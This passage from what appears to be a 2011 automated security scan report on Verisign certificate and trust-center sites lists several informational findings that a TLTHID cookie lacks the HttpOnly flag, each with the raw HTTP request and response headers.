The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:43 GMT Server: ApacheSet-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11759 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
10.65. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/production_trial_initial
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/production_trial_initial HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:44 GMT Server: ApacheSet-Cookie: TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://ssl-certificate-center.verisign.com/process/retail/production_trial_product_selector?uid=21e134a09c6b802996d1066fe9c13ef5&product=GSPT001 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
10.66. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/trustseal_trial_initial
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trustseal_trial_initial HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:45 GMT Server: ApacheSet-Cookie: TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_new_account?uid=9e535ad90e202dd2be1657e6ee2caf70&product=TRUSTSEALTRIAL Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
10.67. https://trust-center.verisign.ch/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.ch
Path:
/process/retail/console_login
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: trust-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:46 GMT Server: ApacheSet-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11715 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
10.68. https://trust-center.verisign.ch/process/retail/trust_initial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.ch
Path:
/process/retail/trust_initial
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_initial HTTP/1.1 Host: trust-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:46 GMT Server: ApacheSet-Cookie: TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.ch/process/retail/trust_product_selector?uid=2f451e38320cb4cf9a868171c06fe1c9&product=TRUSTSEAL001 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
10.69. https://trust-center.verisign.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/favicon.ico
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:45 GMT Server: ApacheSet-Cookie: TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:07 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 4710 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/x-icon ...... ..........F... ......................h...............(...>...(... ...@....................................... ................. !....)...9.'&'.(*&.)*(.44-.=?8.BC?...U...]...a. d...i. .h......[SNIP]...
10.70. https://trust-center.verisign.com/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/console_login
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:48 GMT Server: ApacheSet-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 12062 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
10.71. https://trust-center.verisign.com/process/retail/help_and_support
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/help_and_support
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/help_and_support HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:53 GMT Server: ApacheSet-Cookie: TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 138732 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
10.72. https://trust-center.verisign.com/process/retail/redirect
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/redirect
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/redirect HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:47:00 GMT Server: ApacheSet-Cookie: TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.com/process/retail/console_home?uid=a5f0b94a4c89f47ae217b662fc5fdac5 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
10.73. https://trust-center.verisign.com/process/retail/trust_initial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_initial
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_initial?application_locale=VTC_US&promoCode=TSAB9999&UI=PPT HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:26:31 GMT Server: ApacheSet-Cookie: TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.com/process/retail/trust_product_selector?uid=54e97416d385e356d49a079c459d836b&product=TRUSTSEAL001 Vary: Accept-Encoding Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html
10.74. https://trust-center.verisign.com/process/retail/trust_product_selector
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_product_selector
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 41019 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> ...[SNIP]...
10.75. https://trust-center.verisign.com/process/retail/trust_product_selector.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_product_selector.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_product_selector.do HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:47:02 GMT Server: ApacheSet-Cookie: TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.com/process/retail/trust_capture_tech_contact_details?uid=25a7ccba99f4ee1a587cdec832e34e73 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
10.76. https://trust-center.verisign.com/rcm/TeaLeafTarget.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/TeaLeafTarget.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /rcm/TeaLeafTarget.html HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 Content-Length: 1103 X-TeaLeaf-Page-Objects: 0 Origin: https://trust-center.verisign.com X-TeaLeaf-Page-Img-Fail: 1 X-TeaLeaf-Page-Render: 123 X-TeaLeaf: ClientEvent X-TeaLeaf-UIEventCapture-Version: 2009.11.17.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: text/xml X-TeaLeaf-Screen-Res: 4 X-TeaLeafType: PERFORMANCE X-TeaLeafSubType: undefined; INIT X-TeaLeaf-Page-Url: /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941 X-TeaLeaf-Browser-Res: 3 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719 <ClientEventSet PostTimeStamp="1315621658502" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID21H27M8S358R0.8013692023232579" TimeDuration="123" DateSince1970="1315621628481" > ...[SNIP]...
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:10 GMT Server: ApacheSet-Cookie: TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 32 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html <html> <body> OK </body> </html>
10.77. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/arrow_progressBar_gray.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/arrow_progressBar_gray.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: ApacheSet-Cookie: TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 91 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a...............................!.......,.......... hs......+RR.N...}...XF.M4....1...;
10.78. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/arrow_progressBar_red.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/arrow_progressBar_red.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: ApacheSet-Cookie: TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 90 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.........3....d.....2Y........!.......,...........(e.......RR.L...}Z..XF.M4.. .M..;
10.79. https://trust-center.verisign.com/rcm/verisign/images/divider.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/divider.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/divider.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: ApacheSet-Cookie: TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 44 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.. ..........!.......,...... ........;
10.80. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/ico_questionmark.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
